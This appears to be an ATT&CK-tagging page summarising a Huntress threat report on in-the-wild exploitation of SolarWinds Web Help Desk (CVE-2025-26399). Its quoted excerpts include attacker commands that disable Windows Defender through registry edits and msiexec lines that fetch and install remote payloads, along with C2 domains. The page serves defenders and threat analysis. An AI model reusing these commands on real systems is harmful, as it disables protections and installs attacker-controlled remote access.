TTPwire Vol. 1 · MITRE ATT&CK·Tagged


Huntress

Active Exploitation of SolarWinds Web Help Desk (CVE-2025-26399)

2026-02-08

ATT&CK techniques detected

14 predictions
T1112 Modify Registry
100%
“v Start /t REG_DWORD /d 4 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /…”
T1059.001 PowerShell
100%
“PowerShell commands via the Velociraptor agent, all following the same execution pattern: powershell.exe -ExecutionPolicy Unrestricted -EncodedCommand. This is consistent with Velociraptor's default method for executing PowerShell on endpoints, where commands are Base64-e…”
T1190 Exploit Public-Facing Application
100%
“Active Exploitation of SolarWinds Web Help Desk (CVE-2025-26399) Acknowledgments: Special thanks to Dipo Rodipe, Dray Agha, and Lindon Wass for their contributions to this investigation and write-up. TL;DR: Huntress has observed threat actors exploiting SolarWinds Web…”
T1059.001 PowerShell
99%
“defenders with endpoint monitoring and artifact collection, its capabilities, such as remote command execution, file retrieval, and process execution via VQL queries, make it equally effective as a C2 framework when pointed at attacker-controlled infrastructure. The uncovered V…”
T1053.005 Scheduled Task
98%
“a redundancy measure in case the earlier PowerShell-based Elastic Cloud exfiltration did not succeed. Velociraptor service restart The last event observed in this chain was the Velociraptor service restarting at 12:38:41 UTC, consistent with the C2 failover script calling r…”
T1190 Exploit Public-Facing Application
79%
“. In one case, QEMU was no longer on the machine, which came in compromised. It is unclear if the attacker cleaned up after themselves, or if that part of the attack was just unsuccessful in general. The earliest known instance of this persistence mechanism was installed on Janua…”
T1572 Protocol Tunneling
77%
“Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f VS Code tunnel binary download from Supabase Approximately a second after disabling Defender, the threat actor downloaded a fresh copy of the VS Code binary: code.exe at the same path via Get-FileHash. …”
T1018 Remote System Discovery
69%
“…hold, they executed Active Directory discovery commands to enumerate domain-joined machines via net group "Domain Computers" /do, a textbook reconnaissance technique aimed at identifying viable targets for lateral movement. Figure 2: Huntress detection of domain reconnais…”
T1041 Exfiltration Over C2 Channel
49%
“URL: msiexec /q /i hxxps://github[.]com/cloudflare/cloudflared/releases/latest/download/cloudflared-windows-amd64.msi This establishes an additional tunnel-based channel alongside the existing Velociraptor C2 connection, giving the threat actor redund…”
T1008 Fallback Channels
42%
“with an HTTP 406 (Not Acceptable) status code, the script rewrites the Velociraptor client.config.yaml on disk, replacing the current C2 domain auth.qgtxtebl.workers[.]dev with v2-api.mooo[.]com, and restarts the Velociraptor service to pick up the new configuratio…”
T1190 Exploit Public-Facing Application
42%
“database, and CVE-2025-26399 was just recently discussed by Microsoft and other vendors who have also observed active in-the-wild exploitation. All previous versions of SolarWinds Web Help Desk prior to 12.8.7 HF1 are vulnerable to these vulnerabilities. You can find th…”
T1219 Remote Access Tools
42%
“…iexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi The adversary leveraged the file-hosting service Catbox to stage a Zoho ManageEngine RMM agent, a legitimate remote management tool that may be abused by threat actors to maintain persistent, hands-on access to …”
T1047 Windows Management Instrumentation
41%
“WHD administrative interfaces should not be publicly accessible. Place WHD behind a VPN or firewall and remove direct Internet access to admin paths. - Reset passwords for all service accounts, administrator accounts, and any credentials accessible through or stored within the WH…”
T1112 Modify Registry
31%
“trial deployment on Elastic's legitimate SaaS infrastructure hosted on GCP. In an ironic twist, the threat actor essentially built themselves a SIEM, using Elastic, no less -- to triage their victims. Every compromised host phones home with its full system profile to a central…”

Summary

Huntress has observed active exploitation of a deserialization and remote code execution vulnerability in the SolarWinds Web Help Desk software (CVE-2025-26399).